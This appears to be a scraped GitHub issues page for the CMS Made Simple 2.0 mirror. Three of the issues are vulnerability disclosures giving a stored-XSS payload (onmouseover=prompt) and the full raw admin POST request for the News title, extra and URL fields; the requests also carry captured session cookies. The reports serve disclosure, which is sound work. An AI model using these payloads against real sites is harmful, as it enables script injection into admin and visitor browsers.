cmsmadesimple / cmsmadesimple-2-0 Goto Github PK
View Code? Open in Web Editor NEWGit mirror of the CMS Made Simple 2.0 rewrite
Home Page: http://cmsmadesimple.org
cmsmadesimple-2-0's People
Stargazers
Watchers
cmsmadesimple-2-0's Issues
XSS Vulnerability in CMS MADE SIMPLE version 2.2.7 via m1_title parameter
Locate :Content ----> News---->add article
payload:1" onmouseover=prompt(907460) bad="
Affected vector: m1_title
HTTP REQUEST:
POST /xxxx/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
dinakaran1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627 Content-Disposition: form-data; name="m1_content"sss
----------1960545627 Content-Disposition: form-data; name="m1_status"published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
slugform
----------1960545627
Content-Disposition: form-data; name="m1_extra"
informative
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
Found a possible security concern
Hey there!
I belong to an open source security research community, and a member (@mdakh404) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
XSS Vulnerability in CMS MADE SIMPLE version 2.2.7 via m1_extra parameter
Locate :Content ----> News---->add article
payload:1" onmouseover=prompt(907460) bad="
Affected vectors:m1_extra
HTTP REQUEST:
POST /suganya/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
dinakaran
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627 Content-Disposition: form-data; name="m1_content"sss
----------1960545627 Content-Disposition: form-data; name="m1_status"published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
Slugform
----------1960545627
Content-Disposition: form-data; name="m1_extra"
informative1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
Install quirks while using a clone of the git repo: /tmp/ and /tmp/templates_c/ directories don't exist...
In the install text file, it expects that /tmp/ and /tmp/templates_c/ directories will exist to begin with, but they do not (as you learn when you get to the install step).
(perhaps this is because they're empty directories that haven't been added to the git repository?)
XSS Vulnerability in CMS MADE SIMPLE version 2.2.7 via m1_news_url parameter
Locate :Content ----> News---->add article
payload:1" onmouseover=prompt(907460) bad="
Affected vectors: m1_news_url
HTTP REQUEST:
POST /XXXXX/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
Dinakaran
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627 Content-Disposition: form-data; name="m1_content"sss
----------1960545627 Content-Disposition: form-data; name="m1_status"published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
slugform1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_extra"
Informative
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.